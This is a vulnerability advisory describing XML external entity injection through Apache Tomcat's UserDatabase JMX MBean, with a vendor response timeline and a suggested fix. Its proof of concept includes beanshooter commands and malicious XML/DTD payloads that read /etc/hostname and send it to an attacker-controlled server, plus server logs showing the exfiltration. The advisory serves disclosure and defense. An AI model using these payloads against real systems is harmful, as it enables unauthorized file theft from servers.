usd-2022-0036 | XML External Entity Injection in Apache Tomcat via JMX

Advisory ID: usd-2022-0036
Product: Apache Tomcat
Affected Version: Tested on Apache Tomcat 9.0.58, probably others
Vulnerability Type: Improper Restriction of XML External Entity Reference (CWE-611)
Security Risk: Medium
Vendor URL: https://tomcat.apache.org/
Vendor acknowledged vulnerability: No
Vendor Status: Not fixed

Tomcat deliberatley allows external xml entities as configuration files are expected to be only controllable by trusted users. Because of this, this issue does not meet the Apache Foundations bar for servicing in a security update.

Affected Component(s)

The vulnerability affects the UserDatabase JMX component of Apache Tomcat. This MBean is capable of managing users and roles with access to the Apache Tomcat server.

Description

Apache Tomcat is a popular open source webserver for running Java based web applications and can be monitored via JMX. JMX (Java Management Extensions), on the other hand, is a popular framework that allows monitoring and maintaining Java based applications over the network. Unauthorized access to JMX is a well known attack vector that grants the attacker plenty of possibilities to compromise the underlying application server. That being said, the overall exploitability strongly depends on the available MBeans, the configured JMX permissions and the presence of a Security Manager. Depending on the above mentioned settings, the consequences of an attacker with JMX access can range from critical Remote Code Execution (RCE) issues to medium severity information leakage.

Finding new ways of abusing available MBeans for malicious purposes is therefore an interesting target for attackers. We identified that the UserDatabase MBean, which is available per default on Apache Tomcat servers with JMX enabled, can be abused for XML External Entity Injection (XXE) attacks. This may allow an attacker to read local files from the affected system or to perform further requests within the internal network on the affected systems behalf.

Proof of Concept

For the following proof of concept, we use an Apache Tomcat server located at 172.17.0.2 with JMX enabled on port 1090. Furthermore, we use the beanshooter tool to demonstrate a possible attack.

First of all, we can enumerate available methods and attributes from the UserDatabase MBean using the following command:

[user@host ~]$ beanshooter info 172.17.0.2 1090 Users:type=UserDatabase,database=UserDatabase[+] MBean Class: org.apache.catalina.mbeans.MemoryUserDatabaseMBean[+] ObjectName: Users:type=UserDatabase,database=UserDatabase[+][+]     Attributes:[+]         modelerType (type: java.lang.String , writable: false)[+]         readonly (type: boolean , writable: false)[+]         roles (type: [Ljava.lang.String; , writable: false)[+]         groups (type: [Ljava.lang.String; , writable: false)[+]         users (type: [Ljava.lang.String; , writable: false)[+]         pathname (type: java.lang.String , writable: true)[+]         writable (type: null , writable: false)[+][+]     Operations:[+]         java.lang.String findGroup(java.lang.String groupname)[+]         java.lang.String createUser(java.lang.String username, java.lang.String password, java.lang.String fullName)[+]         void removeGroup(java.lang.String groupname)[+]         void removeUser(java.lang.String username)[+]         void save()[+]         java.lang.String findRole(java.lang.String rolename)[+]         void removeRole(java.lang.String rolename)[+]         java.lang.String createGroup(java.lang.String groupname, java.lang.String description)[+]         java.lang.String findUser(java.lang.String username)[+]         java.lang.String createRole(java.lang.String rolename, java.lang.String description)

Apache Tomcat users are usually defined within the file /usr/local/tomcat/conf/tomcat-users.xml, but as one can see, the pathname property of the UserDatabase is writable and it is possible to change the location. Surprisingly, even remote locations are allowed by using a remote URI like http://172.17.0.1/test.xml.This enables an attacker to provide a malicious XML file that contains an XXE payload. The following listing shows an example where two malicious XML files are used to exfiltrate local files using an outbound connection:

[qtc@devbox www]$ cat test.xml<?xml version='1.0' encoding='utf-8'?><!DOCTYPE tomcat-users [<!ENTITY % file SYSTEM "file:///etc/hostname"><!ENTITY % dtd SYSTEM "[http://172.17.0.1:8000/test.dtd">]()%dtd;]><tomcat-users xmlns="[http://tomcat.apache.org/xml"]()              xmlns:xsi="[http://www.w3.org/2001/XMLSchema-instance"]()              xsi:schemaLocation="[http://tomcat.apache.org/xml]() tomcat-users.xsd"              version="1.0">    &send;</tomcat-users>[qtc@devbox www]$ cat test.dtd<?xml version="1.0" encoding="UTF-8"?><!ENTITY % all "<!ENTITY send SYSTEM '[http://172.17.0.1:8000/?file=%file;'>">]()%all;

By changing the pathname property of the UserDatabase MBean, it is possible to load the malicious XML documents from an attacker controlled server. After the XML files were obtained, the JMX server sends the content of the file /etc/hostname to the attacker controlled system:

[qtc@devbox ~]$ beanshooter attr 172.17.0.2 1090 Users:type=UserDatabase,database=UserDatabase pathname [http://172.17.0.1:8000/test.xml]()[qtc@devbox www]$ python3 -m http.serverServing HTTP on 0.0.0.0 port 8000 ([http://0.0.0.0:8000/)]() ...172.17.0.2 - - [02/Aug/2022 07:20:35] "GET /test.xml HTTP/1.1" 200 -172.17.0.2 - - [02/Aug/2022 07:20:35] "GET /test.dtd HTTP/1.1" 200 -172.17.0.2 - - [02/Aug/2022 07:20:35] "GET /?file=76b0620c44ea HTTP/1.1" 200

Fix

Processing of external entities within the user database of Apache Tomcat should be disabled by default. Enabling the processing of external entities as a feature can still be possible by creating a corresponding configuration option.

References

Timeline

  • 2022-08-02: First contact request via security@tomcat.apache.org.
  • 2022-08-04: Vendor states that "JMX access should be treated as equivalent to local root/admin access and restricted accordingly" and that the "Tomcat configuration files deliberatley allow the use of XXE".
  • 2022-11-24: This advisory is published

Credits

This security vulnerability was identified by Tobias Neitzel of usd AG.